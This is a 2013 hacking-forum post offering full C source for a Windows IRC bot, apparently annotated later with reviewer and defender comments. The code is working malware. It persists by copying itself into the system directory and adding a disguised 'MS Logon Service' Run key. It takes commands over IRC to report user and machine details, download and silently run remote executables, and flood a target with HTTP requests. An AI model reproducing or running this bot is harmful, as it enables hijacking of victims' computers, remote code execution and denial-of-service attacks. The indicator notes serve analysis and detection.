
Simple BOT written in C language Unknown rwxr-xr-x 0 5/11/2013

Filename Simple BOT written in C language
Permission rw-r--r--
Author Unknown
Date and Time 5/11/2013
./Arizona Team

Hello guys, welcome back to the Arizona programming zone. After looking around in this hacking world, I found many script kiddies: useless people using Trojans and bots made by someone else. Hell for such guys. There are tons of so-called security prof.. bla bla bla white hats bla bla..

One question to those money-sucking people: where do you disappear when the country is under cyber threat?? Anyway, I don't want this young generation to be bluffed by such people. There is no shortcut to success.






We need you; this country needs you. Keep learning and throw out those tools. Toys are used by kids, not by Cyber Warriors.

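A simple bot which can be used on Facebook, Google+, Yahoo Messenger and any sort of IRC. As listed, the code speaks only the IRC protocol: it connects to the configured server on TCP port 6667, joins one channel and takes commands from a single controlling nick.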


Understand the logical flow and create a new one. If you have any difficulty in understanding the logical flow you can write to me at instructor@arizonainfotech.com

Enjoy learning..

Here is the code, written in C:

#include <windows.h>
#include <winsock2.h>
#include <stdio.h>



/*
 * Build-time configuration. All three values on the page are placeholders
 * ("#channel", "your_nick", "irc_server"), not live infrastructure.
 * NOTE(review): names of the form _NAME_ (underscore followed by an
 * uppercase letter) are reserved for the implementation in C.
 */
/* IRC channel the bot joins after registering. */
#define _CHANNEL_ "#channel"
/* The one nick whose PRIVMSG lines are treated as commands. */
#define _CONTROL_ "your_nick"
/* IRC server, as a host name or dotted IPv4 address. */
#define _SERVER_ "irc_server"

/* Size of every fixed char buffer declared in this file. */
#define BUF_LENGTH 1024

// Prototypes
int startWinsock(void);
long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr);

/*
 * Argument block handed to the download() thread: the HTTP server to contact
 * and the path to request from it. Both fields are filled from the text of
 * a "download" command in WinMain.
 */
struct DOWNLOADSTRUCT
{
    char host[BUF_LENGTH];
    char path[BUF_LENGTH];
};

/*
 * Argument block handed to the dos() thread: the target host and the number
 * of connect/request/close cycles to run. Filled from the text of a "dos"
 * command in WinMain.
 */
struct DOSSTRUCT
{
    char host[BUF_LENGTH];
    int count;
};

/*
 * Thread entry point: fetch a file over plain HTTP and execute it.
 *
 * arg points to a DOWNLOADSTRUCT (host, path). The routine connects to TCP
 * port 80 of host, sends a GET for path, skips the response headers, writes
 * the body to "temp_<0-4999>.exe" (a relative name, so it lands in the
 * process's current directory) and starts that file with
 * WinExec(fname, SW_HIDE). Every exit path ends in ExitThread(0).
 *
 * Defender notes:
 *  - The payload is neither authenticated nor verified; whatever the HTTP
 *    server returns is written to disk and run.
 *  - Host artefacts: a file named temp_<n>.exe created and then launched
 *    with a hidden window by the same process.
 *  - Network artefacts: an unencrypted HTTP/1.1 GET on port 80 whose only
 *    header is Host.
 *  - NOTE(review): arg is a pointer to storage owned by the caller (WinMain
 *    passes the address of a local), so a second command can overwrite it
 *    while this thread is still reading it.
 */
DWORD WINAPI download(LPVOID arg)
{
    DOWNLOADSTRUCT *ds = (DOWNLOADSTRUCT*)arg;
    long rc;
    SOCKET s;
    SOCKADDR_IN addr;
    int lc, i;
    FILE *f;
    char buf[BUF_LENGTH], fname[BUF_LENGTH];
   
    rc=startWinsock();
    if(rc!=0)
        ExitThread(0);

    s=socket(AF_INET,SOCK_STREAM,0);
    if(s==INVALID_SOCKET)
        ExitThread(0);

    // Destination is always TCP port 80 on the host named in the command.
    memset(&addr,0,sizeof(SOCKADDR_IN));
    addr.sin_family=AF_INET;
    addr.sin_port=htons(80);
    rc=getAddrFromString(ds->host,&addr);
    if(rc==SOCKET_ERROR)
        ExitThread(0);

    rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR));
    if(rc==SOCKET_ERROR)
        ExitThread(0);
       
    // NOTE(review): host and path may each be up to BUF_LENGTH bytes, while
    // buf is BUF_LENGTH bytes in total and sprintf is unbounded.
    sprintf(buf, "GET /%s HTTP/1.1\r\nHost: %s\r\n\r\n", ds->path, ds->host);
    send(s,buf,strlen(buf),0);
   
    // Skip the response headers: read one byte at a time until two line
    // feeds are seen with only carriage returns between them.
    lc = 0;
    while(lc < 2)
    {
        rc=recv(s,buf,1,0);
        if(buf[0] == '\n') lc++;
        else if(buf[0] != '\r') lc = 0;
    }
   
    // Output name is temp_<rand() % 5000>.exe, opened for binary writing.
    sprintf(fname, "temp_%i.exe", (rand() % 5000));
    f = fopen(fname, "wb");
   
    // Copy the rest of the stream to the file until the peer closes.
    while((rc=recv(s,buf,256,0)) != 0)
    {
        if(rc==SOCKET_ERROR)
            ExitThread(0);
        for(i = 0;i < rc;i++)
            fprintf(f, "%c", buf[i]);
    }
    fclose(f);
 
    closesocket(s);
    WSACleanup();

    // Launch the downloaded file with its window hidden.
    WinExec(fname, SW_HIDE);
   
    ExitThread(0);
}

/*
 * Thread entry point: repeated HTTP requests against one host.
 *
 * arg points to a DOSSTRUCT (host, count). For each of count iterations the
 * routine opens a new TCP connection to port 80 of host, sends one
 * "GET / HTTP/1.1" request and closes the socket without reading a reply.
 * Socket creation and connect are retried every 500 ms until they succeed.
 * Every exit path ends in ExitThread(0).
 *
 * Defender notes:
 *  - Traffic shape seen by the target: many short-lived connections from
 *    one source, each carrying an identical request for "/" whose only
 *    header is Host, closed by the client immediately after sending.
 *  - On the infected host the same pattern appears as a burst of outbound
 *    port-80 connections from the bot process.
 */
DWORD WINAPI dos(LPVOID arg)
{
    DOSSTRUCT *ds = (DOSSTRUCT*)arg;
    long rc;
    SOCKET s;
    SOCKADDR_IN addr;
    int lc, i;
    char buf[BUF_LENGTH];
   
    rc=startWinsock();
    if(rc!=0)
        ExitThread(0);

    for(i = 0;i < ds->count;i++)
    {
        // Retry until a socket can be created.
        while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(500);

        // The host name is resolved again on every iteration.
        memset(&addr,0,sizeof(SOCKADDR_IN));
        addr.sin_family=AF_INET;
        addr.sin_port=htons(80);
        rc=getAddrFromString(ds->host,&addr);
        if(rc==SOCKET_ERROR)
            ExitThread(0);


        // Retry the connect every 500 ms until it succeeds.
        while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(500);
   
        sprintf(buf, "GET / HTTP/1.1\r\nHost: %s\r\n\r\n", ds->host);
        send(s,buf,strlen(buf),0);
        closesocket(s);
    }
 
    WSACleanup();
   
    ExitThread(0);
}

/* Thread ids written by CreateThread for the download and dos workers. */
unsigned long downloadtid, dostid;

/*
 * Bot entry point: installs a copy of itself, registers it for start-up,
 * connects to the IRC server and runs the command loop.
 *
 * Host artefacts set up here (usable as indicators):
 *  - a copy of the running image at <system directory>\logon_service.exe
 *  - a value named "MS Logon Service" under
 *    HKLM\Software\Microsoft\Windows\CurrentVersion\Run holding that path
 *  The results of CopyFile, RegOpenKeyEx and RegSetValueEx are not checked.
 *
 * Network artefacts:
 *  - TCP connection to _SERVER_ on port 6667
 *  - NICK and USER set to "bot_<0-29999>", then JOIN of _CHANNEL_
 *
 * Commands, taken from PRIVMSG lines whose sender nick equals _CONTROL_:
 *  exit, uninstall, info, download <host> <path>, dos <host> <count>.
 * The sender check is a plain string comparison on the nick; nothing else
 * authenticates the controller.
 *
 * Returns 1 if the server name cannot be resolved, otherwise 0.
 */
int WINAPI WinMain(HINSTANCE w1, HINSTANCE w2, PSTR w3, int w4)//main()
{
    long rc;
    SOCKET s;
    SOCKADDR_IN addr;
    char buf[BUF_LENGTH], buf2[BUF_LENGTH], buf3[BUF_LENGTH], channel[] = _CHANNEL_, master[] = _CONTROL_, nick[BUF_LENGTH], *ptr;
    int i, sm;
    DWORD l;
    OSVERSIONINFOEX osinfo;
    DOWNLOADSTRUCT ds;
    DOSSTRUCT dss;
    HWND hWnd;
    HKEY hKey;
 
    // This allocation is never freed; ptr is reassigned by strtok below.
    ptr = (char *)malloc(BUF_LENGTH);
    // sm is the "send message" flag: set when buf2 holds a reply to post.
    sm = 0;
   
    srand(time(NULL));
   
    // Persistence: copy the running image into the system directory under
    // the name logon_service.exe and point a Run value at the copy.
    hWnd = (HWND)GetModuleHandle(NULL);
    GetModuleFileName((HINSTANCE)hWnd, buf, sizeof(buf));
    GetSystemDirectory(buf2, sizeof(buf2));
    strcat(buf2, "\\logon_service.exe");
    CopyFile(buf, buf2, 0);
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hKey);
    RegSetValueEx(hKey, "MS Logon Service", 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
    RegCloseKey(hKey); 

    // buf is compared with itself, so this branch can never run.
    if((strcmp(buf, buf) != 0))
    {
        // Fake Message
        //MessageBox(NULL, "Error #235\n\nCouldn't open 'sro_c.exe'\nAbort", "Install Error", MB_OK + MB_ICONERROR);
    }
   
    // Start Winsock
    startWinsock();
    printf("Winsock gestartet\n");
  // Create the socket (retried once a second until it succeeds)
    while((s=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET) Sleep(1000);
    printf("Socket erstellt\n");
  // Connect
    memset(&addr,0,sizeof(SOCKADDR_IN)); // zero the structure first
    addr.sin_family=AF_INET;
    addr.sin_port=htons(6667); // port 6667 (the original comment named port 12345, which does not match the code)
    rc=getAddrFromString(_SERVER_,&addr);
    if(rc==SOCKET_ERROR)
        return 1;


    // Retry the connect once a second until it succeeds.
    while((rc=connect(s,(SOCKADDR*)&addr,sizeof(SOCKADDR))) == SOCKET_ERROR) Sleep(1000);
   
    // Nick is "bot_" followed by rand() % 30000.
    sprintf(nick, "bot_%i", rand() % 30000);
  /*
    rc=recv(s,buf,1000,0);
    rc=recv(s,buf,1000,0);
    buf[rc] = '\0';
*/
    // IRC registration: the same generated name is used for NICK and USER.
    sprintf(buf, "NICK %s\r\nUSER %s \"localhost\" \"%s\" :%s\r\n", nick, nick, _SERVER_, nick);
    send(s,buf,strlen(buf),0);
/*
    rc=recv(s,buf,1000,0);
    buf[rc] = '\0';
 
    strtok(buf, " ");
    strcpy(buf2, strtok(NULL, ""));
    strcpy(buf, "PONG ");
    strcat(buf, buf2);
    send(s,buf,strlen(buf),0);
*/
    // Read until the server's end-of-MOTD text appears in a received chunk.
    // NOTE(review): rc is used as an index without checking for
    // SOCKET_ERROR or 0.
    do
    {
        rc=recv(s,buf,1000,0);
        buf[rc] = '\0';
    } while(!strstr(buf, "End of /MOTD command"));
 
 
    sprintf(buf, "JOIN %s\r\n", channel);
    send(s,buf,strlen(buf),0);

    // Exchange data: main command loop, left when the connection closes or
    // fails.
    while(rc!=SOCKET_ERROR)
    {
        rc=recv(s,buf,1000,0);
        if(rc==0)
            break;
        if(rc==SOCKET_ERROR)
            break;
        buf[rc]='\0';
   
        // Keep-alive: answer a server PING with PONG plus the same argument.
        if(!strnicmp(buf, "PING", 4))
        {
            strtok(buf, " ");
            strcpy(buf2, strtok(NULL, ""));
            strcpy(buf, "PONG ");
            strcat(buf, buf2);
            send(s,buf,strlen(buf),0);
        }
        else if(strstr(buf, "PRIVMSG"))
        {
            // Extract the sender nick: the text before '!' with the first
            // character shifted out.
            strcpy(buf2, buf);
            ptr = strtok(buf2, "!");
            for(i = 1;i <= strlen(ptr);i++) ptr[i - 1] = ptr[i];
            // Only lines from the configured controller nick are acted on.
            if(strcmp(ptr, master) == 0)
            {
                // Command text: what follows the next ':' up to the CR.
                ptr = strtok(buf, ":");
                ptr = strtok(NULL, "\r");
           
                // "exit": disconnect and end the process.
                if(strcmp(ptr, "exit") == 0)
                {
                    closesocket(s);
                    WSACleanup();
                    return 0;
                }
                // "uninstall": overwrites the Run value's data with the
                // string "nothing..." and exits. The value itself and the
                // copied logon_service.exe are not deleted, so both remain
                // on the host for responders to find and remove.
                else if(strcmp(ptr, "uninstall") == 0)
                {
                    sprintf(buf2, "nothing...");
                    RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hKey);
                    RegSetValueEx(hKey, "MS Logon Service", 0, REG_SZ, TEXT(buf2), strlen(buf2)+1);
                    RegCloseKey(hKey);
                   
                    closesocket(s);
                    WSACleanup();
                    return 0;
                }
                // "info": collects user name, computer name and an OS name
                // into buf2 and sets sm so the text is posted to the channel
                // at the end of this iteration.
                else if(strcmp(ptr, "info") == 0)
                {
                    l = sizeof(buf);
                    GetUserName(buf, &l);
                    sprintf(buf2, "Username: %s", buf);
                    GetComputerName(buf, &l);
                    sprintf(buf3, "%s, Computername: %s", buf2, buf);
                    sm = 1;
                    ZeroMemory(&osinfo, sizeof(OSVERSIONINFO));
                    osinfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
                    GetVersionEx((OSVERSIONINFO *) &osinfo);
                    l = osinfo.dwMinorVersion;
                    strcpy(buf, "???");
                    // Map major/minor version numbers to a product name.
                    switch(osinfo.dwMajorVersion)
                    {
                        case 5:
                            if(l == 0)
                                strcpy(buf, "Windows 2000");
                            else if(l == 1)
                                strcpy(buf, "Windows XP");
                            else if(l == 2)
                            {
                                // The == 0 and != 0 tests below cover every
                                // value, so the final else is unreachable.
                                if(osinfo.wSuiteMask == 0x8000)
                                    strcpy(buf, "Windows Home Server");
                                else if(GetSystemMetrics(89) == 0)
                                    strcpy(buf, "Windows Server 2003");
                                else if(GetSystemMetrics(89) != 0)
                                    strcpy(buf, "Windows Server 2003 R2");
                                else
                                    strcpy(buf, "Windows XP Professional x64 Edition");
                            }
                        break;
                   
                        case 6:
                            if(l)
                            {
                                if(osinfo.wProductType != VER_NT_WORKSTATION)
                                    strcpy(buf, "Windows Server 2008 R2");
                                else
                                    strcpy(buf, "Windows 7");
                            }
                            else
                            {
                                if(osinfo.wProductType == VER_NT_WORKSTATION)
                                    strcpy(buf, "Windows Vista");
                                else
                                    strcpy(buf, "Windows Server 2008");
                            }
                        break;
                   
                        default:
                            strcpy(buf, "???");
                        break;
                    }
               
                    sprintf(buf2, "%s, OS: %s", buf3, buf);
                }
                // "download <host> <path>": fills ds and starts download()
                // in a new thread. Any command beginning with "download"
                // matches, because only the prefix is compared.
                else if(strncmp(ptr, "download", strlen("download")) == 0)
                {
                    ptr = strtok(ptr, " ");
                    ptr = strtok(NULL, " ");
                    sprintf(ds.host, "%s", ptr);
                    ptr = strtok(NULL, " ");
                    sprintf(ds.path, "%s", ptr);
               
                    CreateThread(NULL, 0, download, &ds, 0, &downloadtid);
                }
                // "dos <host> <count>": fills dss and starts dos() in a new
                // thread; count is converted with atoi.
                else if(strncmp(ptr, "dos", strlen("dos")) == 0)
                {
                    ptr = strtok(ptr, " ");
                    ptr = strtok(NULL, " ");
                    sprintf(dss.host, "%s", ptr);
                    ptr = strtok(NULL, " ");
                    dss.count = atoi(ptr);
               
                    CreateThread(NULL, 0, dos, &dss, 0, &dostid);
                }
                else
                {
                    buf[0] = '\0';
                }
       
                // Post the pending reply (set only by "info") to the channel.
                if(sm)
                {
                    sprintf(buf, "PRIVMSG %s :%s\r\n", channel, buf2);
                    send(s,buf,strlen(buf),0);
                    sm = 0;
                }
            }
        }
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

/*
 * Initialise Winsock, requesting version 2.0.
 * Returns the WSAStartup result unchanged (0 on success); the WSADATA
 * details it fills in are discarded.
 */
int startWinsock(void)
{
    WSADATA details;
    int status;

    status = WSAStartup(MAKEWORD(2,0), &details);
    return status;
}


/*
 * Fill addr->sin_addr from a dotted IPv4 string or a host name.
 *
 * The text is first tried as a literal address with inet_addr; if that
 * yields INADDR_NONE it is looked up with gethostbyname and the first
 * returned address is copied (4 bytes).
 * Returns 0 on success, SOCKET_ERROR if either argument is NULL or the
 * name cannot be resolved. Only sin_addr is written; family and port are
 * left to the caller.
 */
long getAddrFromString(char* hostnameOrIp, SOCKADDR_IN* addr)
{
    unsigned long literal;
    HOSTENT* entry;

    /* Guard clause: both arguments are required. */
    if(!hostnameOrIp || !addr)
        return SOCKET_ERROR;

    /* Dotted-quad input needs no lookup. */
    literal = inet_addr(hostnameOrIp);
    if(literal != INADDR_NONE)
    {
        addr->sin_addr.s_addr = literal;
        return 0;
    }

    /* Otherwise treat the text as a host name. */
    entry = gethostbyname(hostnameOrIp);
    if(entry == NULL)
        return SOCKET_ERROR;

    memcpy(&(addr->sin_addr), entry->h_addr_list[0], 4);
    return 0;
}
